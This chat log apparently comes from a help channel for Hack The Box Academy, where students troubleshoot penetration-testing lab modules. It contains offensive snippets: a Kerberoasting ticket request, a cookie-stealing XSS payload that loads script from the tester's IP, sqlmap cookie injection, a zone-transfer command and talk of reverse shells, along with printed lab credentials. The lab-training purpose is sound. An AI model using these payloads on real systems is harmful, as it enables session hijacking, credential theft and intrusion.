Let me try. I did do the si, but I stopped at the cmp. I will look again.

it's 3 characters, not sure where you got 4 from

I went through the bad way, I realised now

What i was planning to do was this

Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/SQL01.inlanefreight.local:1433"

Then crack the passwword with mimikatz. Got it its' worng way

It's always gone by the default route which isn't the one used for the vpn. Every command I've ran thus far I had to specify the interface or else it didn't work.

┌──(kali㉿kali)-[~/Documents/HTB]
└─$ ip route show                                    
default via 10.0.2.2 dev eth0 proto dhcp src 10.0.2.15 metric 100 
10.0.2.0/24 dev eth0 proto kernel scope link src 10.0.2.15 metric 100 
10.10.10.0/23 via 10.10.14.1 dev tun0 
10.10.14.0/23 dev tun0 proto kernel scope link src 10.10.14.163 
10.10.14.0/23 dev tun1 proto kernel scope link src 10.10.15.164 
10.129.0.0/16 via 10.10.14.1 dev tun0 

and then when I try changing the default to the vpns interface there is no internet.

$rax : 0x32

yeah I guess that would work, but you should just use one of the automated ways in the kerberoast section to do it

0x32 is 50 in decimal

who do I ping or which channel do I write to, to have a module section looked into to see if I'm going insane or if there's something wrong?

Yes, and I thought that was the answer.

that means you have multiple interfaces pointing to the same subnet

does 50x5=10?

No. So, that makes sense on why it is not the correct answer. I do have mov rax, 10, and I did not change anything else.

you're supposed to change the number of mov rax, 10 so that the loop breaks, the answer is the number you change it to

that's it

I don't remember how excatly vbox network inferfaces are configured, but you might want to use a bridged adapaer instead of a NAT

I know I had to go to actual support for one of the questions. I had something mistyped and over thought it.

where is support? I don't see a contact support button

it's at the bottom right of every academy page, if you don't see it, turn off adblock

I just guessed what the Hex was based on the "equation" you provided. I feel mighty foolish for not thinking through it better. Thank you very much.

Another foolish question, do you happen to be zoomed in very far? You can also not access it from the pwnbox. There is a warning when you open the page from the box.

I'm on the module page, I came out of it, under get help, is it the help center? was there where you got support?

My current issue is the splunk instance doesn't have the Sysmon app that they're asking us to fix

wait, how did you think you were supposed to solve the question? you do know that you're supposed to download this right?

Yes, I did download it. I just had the wrong value in the rax

Thank you again

I appreciate it

anytime

answering my own question, changing browsers, there's a popup

Hi has anyway finished command injection module? I have solved the final skill assessment but would like to discuss cuz I think I solved it with necessary steps and can't get the ez method working.

Thank you. I dont know what worked here but I switched it from NAT to Bridged and then terminated all openvpn sessions. Regenerated vpn from the website, set it to TCP, then ran the vpn with the --config extension

mods should really add verification to academy channels

read the #rules, keep asking for stuff like that and you'll get the 👢 up your ass

done that module a good while ago and don't really have that good of a note on that one but you can shoot me a dm if you still have i have a questions about that

LOL

probably caused by your NAT being set to the 10.x.x.x subnet for some reason, just vbox being vbox

HI I have some questions about dante lab which channel should i join can somebody add me to it.Appreciated

https://discord.com/channels/473760315293696010/742339564940820580

read #welcome and #rules after that use /verify at #bot-commands and ask your questions in #prolabs-dante

Did you still need help?

Just curious how everyone is pulling their user lists for the AD enum and attack module. I'm not super great with bash so I couldn't figure out how to do it by that, so I had to do it by hand.

hey I'm having trouble with the last Q in "AD Enumeration & Attacks - Skills Assessment Part I"

I think I need to use || Mimikatz - PowerShell Remoting with Pass the Ticket || but I having trouble with it, someone up for consulting ??

Can someone recommend me the best way to learn C for free?

Take a look to your mimikatz output, you should see something interesting after ||dumping secrets|| then it is always good to check ||rights of any new domain account||

not so sure what u mean ...

Anybody know how to use the OPTIONS method in burpsuite?

You use them very carefully (idk)

Those are just your standard http options yeah

GRACIAS

Cab anybody give me a nudge about where to look in the Windows Privilege Escalation Module, section "Other Files" ? cant find the password they are aasking for -.-

Assuming you already have access to ||tpetty|| then check its domain rights and you will know what to do, otherwise work around mimikatz or whatever tool you use to dump the same things

acssess u mean by that:

right?!

Hi!
I recently encountered a problem in the module "ATTACKING COMMON SERVICES: Attacking DNS". Please tell me what is the problem?
I don't understand what the purpose of the assignment is. I found all subdomains. I tried to find some records on them, but I didn't find anything. I don't understand why the target ip is given in this task

Because you're meant to use dig and some other tools to find the answer against the IP

I.e. dig axfr inlanefreight.htb @ip

Thanks, but I tried to use this command, it doesn't work, it gives the following:
└─$dig axfr inlandfreight.htb @10.129.203.6

; <<>> ; <<>> ; <<>> ; <<>> ; <<>> ; <<>> ; <<>> ; <<>> DiG 9.19.17-1-Debian <<>> axfr inlanefreight.htb @10.129.203.6
;; global parameters: +cmd
; Transfer failed.

A zone can be configured so that a zone transfer is only permitted from certain servers

"And some other tools" the section does go over some tools

try "PSSQLite"

if U get an error check if it's because the scope is already unrestricted...

"><script src=http://10.10.14.15:9000/TESTING_THIS</script>

anybody see something wrong with this?

can I DM?

put the URL in "" after src=

Like this "><script src="http://10.10.14.15:9000/TESTING_THIS"</script>

That didn't work either

Working on the Attacking Enterprise Networks, Web Enumeration & Exploitation, Steal an admin's session cookie and gain access to the support ticketing queue. Submit the flag value for the "John" user as your answer.

support.inlanefreight.local section

There's a ticket submitting forum, I'm supposed to enter that into the message box and catch it back with nc. I'm getting nothing back

close it

"><script src="http://10.10.15.131/fullname"></script>

What's the full name?

sqlmap -r req-case3.txt --batch --dump --cookie='id=1' It doesnt attack cookie id - how can i manage with sqlmap to inject into cookie id

yes, I think so:
"><script src="http://10.10.14.15:9000/TESTING_THIS"></script>

can u refer the section or Q ?

Module: sqlmap Section:Running SQLMap on an HTTP Request

What is the "Testing_This" supposed to be?

I haven't got there yet...

U ahead of me

Tried this verbatim and didn't work

I don't understand

Y R U using -r?

alright ... didnt file any .sqlite file so far, but I guess I missed it then

did U visit that folder and took its correct name?

@umbral fulcrum yes

yes?

i mean im using -r flag but its not attacking cookie id what i have to do

damn I mistyped it before, now it all makes sense, thanks!

hello, very stupid and basic question probably - how to setup vm in a way so its startup fresh instance every time?

not even sure how to look that up in google

Which form field did you use?
Is your web server running on port 9000?

try to add * after 1:
'id-1*'

I used the message field

9000

The module is structured like a walkthrough. Do exactly what is described there.

I believe i am?

Oh, I see...
10.10.14.15 is your IP?

No, i'm putting my ip in though

Restart the instance and then try again. If it doesn't work, try it from the PwnBox

HAHA Restarting worked

Hey @umbral fulcrum can i dm you?
Need to ask something regarding the AD skill assessment part 1 ?

sure

but I think I'm the one that need help there

Ammm just a little push i need

go ahead ...

hey, can anyone help me with 'intro to assembly language:conditional branching'? It ask me to give the hex value that breaks the loop, so I thought it would be ||10|| or ||0xa||, but I got that wrong, can someone help me with this?

Hey guys, so I was looking at doing a tier IV module but it appears to be 90 euros for 1 single module? Am I seeing this correctly?

its 58 if you sub for platinum for one month and instantly cancel, but yes, it is that pricey for the IV modules

• vat so I guess it becomes a bit more expensive still

Is it just me? I can't connect to any Splunk instances in the Academy module. I have tried from both pwnbox and my machine. Says connection has been reset, yet the port is open in nmap scan.

https://academy.hackthebox.com/module/176/section/1782

I need some help on this

 Connect to the target and enumerate the available network shares. What is the password of the Administrator2 user?

Is there a way to figure out how long an nmap scan could take?

Be more specific

I could not find the password

Ok

I have already searched in all shares folder

What module and section is it?

Why doesn't HTB academy develop a mobile application (Android/IOS) PT modules

Windows attack & defense - credentials in share

Hello !
I'm doing the password attack module and i cant install pypykatz on my parrot os
Is there an alternative or a solution ?

I asked this question before and It has less demand i guess compared to Web other category

You haven't.

There's nothing complicated, just following the commands in that section itself will lead you to the password.

why can't you install

in "AD Enumeration & Attacks - Skills Assessment Part II" I went through the whole linux section but I can't C another use in the domain

what am I missing?
please...

I'm doing Password Attacks Pass the Ticket from Linux, I can't get to the DC01 domain, I've checked the validity of the ticket, but keep getting a "dc01.inlanefreight.htb does not exist" error

anyone else having problems spawning target instances?

Is there some glitch in the some of the HTB academy modules where you have to restart your virtual machine multiple times (or at least more than one) for your nmap results to show what port you need to use for that particular lab or are some machines just intentionally designed that way?

if you are talking about the FTP section in the attacking common services module then yes that's a known bug for some time now but it's still a bug nonetheless

Thats what I had in mind ... but I seen another lab that also had this issue

Yes it has happened with me too, multiple of times.

#modules https://academy.hackthebox.com/module/176/section/1778WINDOWS ATTACKS & DEFENSE in kerberoasting section
After performing the Kerberoasting attack, connect to DC1 (172.16.18.3) as 'htb-student:HTB_@cademy_stdnt!' and look at the logs in Event Viewer. What is the ServiceSid of the webservice user?

both target machine and pwnbox instances spawned just fine for me so if you are having issue wait for a bit but if the issue persists contact support

there is any help for that

i got the event of 4769 of kerberos and take the servicesit but htb academy tell me that wrong any help for that ? https://academy.hackthebox.com/module/176/section/1778

Which one?

i've encountered a good bit of similar bugs where it take a few reset to get the target working but if you found the issue and the issue persists probably contact support but if they can't re-create the bug there is nothing they can't do so keep that in mind if you contact theme

It's better to mention the module name and section.

I eventually got the port I needed to use for that lab...but it took many a few number of resets that was higher I anticipated for sure

@pure sorrel and @boreal kelp ask your questions in the format of which module and section are you stuck or having issue on, what did you try and work or fail and what to you need help with

Got it. Just a sec.

pls say module and section name not the id or url

what did you try?

can u help me with my question of kerberoating in https://academy.hackthebox.com/module/176/section/1778

great, but better if this is in your initial question

Password Attack module, section Pass the Ticket from Linux
Currently stuck on the question of reading the contents of julio.txt from domain share folder \DC01\julio

I've set host and proxy chain file, transfered the tmp file to my attackbox, exported the environment variable and added it to bashrc, set up chisel on both my attackbox and MS01

When I used impacted wmiexec or evil-winrm it can't recognize the dc01 domain

i got 0 idea what you even need help with from your questions, just perform the attack in question 1 and filter for the ID 4769 like it said and check a few top one

BTW , once you found the nonstandard port for that lab...you bruteforce the credentials using a mut_password.list and a username.list via hydra tool?

great question, give me 2 sec i'll check my note on this

nope you do some enum

||Use username anarchy on the user you found and use cupp, with the first name (first letter capital), second name (first letter capital), add special chars and use leet mode. Keep everything else blank/NO.||

i dot that the got the servicsid teh the htb acdademy tell me that is wrong answer

for this part just do it on the given target linux box but if you want to do it on your box for some reason make sure both the DC01 hostname and the FQDN DC01.inlanefreight.htb pointing to the DC01 ip and you'll need proxy access to this box not port forwarding if that's what you are doing

you are still giving me and anyone here way too little info to even start to help you, there is hundreds of event with god know how many ServiceSid but only a few have the 4769 id so filter for that id and try a couple of them

i tryed all the answers wrong

there should be one right with the Service Name starting with ||web|| but i no long have access to that module so i can't double check or can't confirm anything

i can't find anything start by web

🤷‍♂️ like i said you're out of luck with me lol, just wait for a bit someone will come and help

there'a alotof people here have same trouple i search on that her

are u know right servicesid bro ?

are u know that bro ?

i need the right answer plz

beside annoying a couple of peoples you won't get anything much from spamming just wait and someone will help or if no help post your question here another time

you're tagging people from months ago wtf

#cdsa message

I have told you here what you should do

hey guys, i just finished the smb section on footprinting module, everything went fine actually, but i don't understand why the path i found was given as a windows path and not a linux path structure

i mean i don't understand why the path is clearly displayed as C:...........\ but the answer should be formulated as a linux path structure

maybe i'm missing something ?can someone explain this to me

lol

Because it's hosted on a Linux box, smb uses Windows file structure so it reformatted to c:\

Hello everyone, I'm still trying to get through the Public Exploits Section and I keep getting this error whenever I try to use GoBuster on the target.
I've been googling to try and figure this out on my own, but I seem to have hit a wall. Any suggestions?

any1 with WINDOWS ATTACKS & DEFENSE module done can you dm?

Just ask your questions here, you'll get faster responses.

can you open the ip in your browser?

i fully understand it now ! thank you very much !

I tried to and it said unable to connect. Could the target machine be offline for some reason?

check the end of your section, you should be able to see the ip and lifetime if it is online

Aren't you missing the port?

I tried it with the port as well, and it still would not connect

gobuster dir -u http://IP:PORT/ -w /usr/share/dirb/wordlists/common.txt
Make sure your command is like this. The slash at the end of the URL is important.

It's still giving me the same error

I even tried resetting PwnBox and spawning a new target machine, same error

you need to add the port and the http://

and now you using a different ip address, you sure it is the correct one?

so something like that: gobuster dir -u http://94.237.49.11:xxxxx -w /usr/share/dirb/wordlists/common.txt

But you shouldn't need GoBuster in the "Public Exploit" section from Getting started.

I thought I was supposed to use it to find the services running on the target.

just open the page and see what is displayed 🙂

i double checked the section for that

Can anyone help with SOC Analyst

What exactly do you need help with?

Managed to figure it out, just misunderstood the directions. Thanks

good day friends, i am at Broken Authentication - Username Injection, tried to add the userid field, tried to remove the oldpasswd field, and tried to change to GET method, but still having "invalid credentials" i am stuck for some time now, any hint please

and tried to edit submit=doreset to submit=submit

i am not sure like should i brute the old pass or what, dont think this is the case

Hi I am currently in SOC lab Windows Event Logs & Finding Evil in the first section Windows Event Logs the first question wants you too RDP into the target but I don't know how to RDP. I believe the command I need to use is this Baldwin0374@htb[/htb]$ xfreerdp /u:Administrator /p:'HTB_@cad3my_lab_W1n10_r00t!@0' /v:[Target IP] /dynamic-resolution
I have tried opening a terminal in the pawnbox and using this but I must be entering it wrong

https://manpages.org/xfreerdp

ok

Ok so these are the man pages

All options for xfreerdp are explained here

So the example in the lab is not the correct command

The commands discussed in the module are actually always correct. Sometimes an IP or a port must be adapted

Ok I will try some things and see what happens

Hey, I have a Q regarding the "AD Enumeration & Attacks - Skills Assessment Part II"

in Q 4 I'm asked to use a common method to obtain weak credentials for another user, I guessing it's ||users spraying || with ||Password123|| or|| 12345678 || and so on, but I can' t get a users list.

so am I suppose to find online some sort of a users list or I'm missing something??

Ok I figured it out thank you so much

Hello, I just started Hack in the Box and so far only completed the module: Intro to the academy. I am an online college student, my major is computer science. I start programming one next month (end of December/beginning of January) and am trying to get somewhat of a head start. What module would be most beneficial to do next? I have not a clue where to go and would appreciate someone pointing me in the right direction. Thank you!

You should check out #welcome to see the rest of the server and check out the paths. Information Security Foundations or SOC Analyst Prerequisites are paths you should consider.
https://academy.hackthebox.com/path/preview/information-security-foundations
https://academy.hackthebox.com/path/preview/soc-analyst-prerequisites

Hey, does anyone know why this happens? A few days ago I was connecting fine

[15:02:14:265] [21409:21410] [ERROR][com.freerdp.core.transport] - BIO_should_retry returned a system error 32: Broken pipe
[15:02:14:265] [21409:21410] [ERROR][com.freerdp.core] - transport_write:freerdp_set_last_error_ex ERRCONNECT_CONNECT_TRANSPORT_FAILED [0x0002000D]
[15:02:14:265] [21409:21410] [ERROR][com.freerdp.core] - freerdp_post_connect failed

Can someone teach me how to hack website because my ACC inactive and I need it back

Ask the Website Support for help

For the Intro to Whitebox Pentesting SA, still extremely puzzled by Skills Assessment 2. Hint says ||code injection should not be possible, even without sanitization or validation||, but not running eval, ran thru a code analysis tool and it suggested the ||new Function|| bit could be bad, so removed it and code analysis is happy anyhow, but the patch checker still seems to think it's vulnerable, and it states using external modules (e.g.: safe-eval) is not allowed so...🤷 what am I missing?

EDIT: Resolved. The checker (if hints are enabled) will only show ONE thing that's wrong... I'd argue the order of it is not ideal (leading to my my spinning in circles) but should have realized it on my own. My problem was, and this is a hint that is sometimes given, it wasn't in my particular case as again -- ||it's gotta run clean -- no crashing||

Okay! I wasn't sure where was a good place to start in the academy. Thank you!

Yeah, I finally got it solved after this:

https://forum.hackthebox.com/t/cannot-connect-to-pki-server-on-windows-attacks-defence-module-pki-esc1-section/301209

In your case, I think it was a date formatting issue:

MM-DD-YYYY

in Attacking Tomcat what is the wordlist to use for the bruteforce xd

ok why it works now but not before

it depends XD?

wtf is wrong with this section? brute force only works in the 1st minute of spawned target

if this happens in exam im done

firwall not active yet 😄 jk no idea actually

i mean

the creds are correct since they are accepted as answers in the section

but not working in the instance to attack

this is kind of frustrating

ok, confirmed:

1. spawn a new instance of the target
2. log in with correct creds
3. sign out of tomcat manager dashboard by closing firefox
4. creds no longer work

Currently working on "crakcing passwords with hashcat" section Cracking Common Hashes
Is it really just trying random rules and hoping for the best or is there something to narrow it down?

I'm doing the Windows Priv Esc Assessment i. I'm stuck on using command injection to connect back to my attacking box. (this is not covered in this module, nor have I learned how to do it). I've done some enumeration on the website but have been unable to connect back to my pwnbox instance. I have a nc listener set up on my attackbox to recieve requests. I've tried some versions of netcat (nc, ncat, netcat) with reverse shells, tried to curl a test file on an http server, tried wget, tried telnet. nothing is connecting back to my attack box. Am I doing this incorrectly?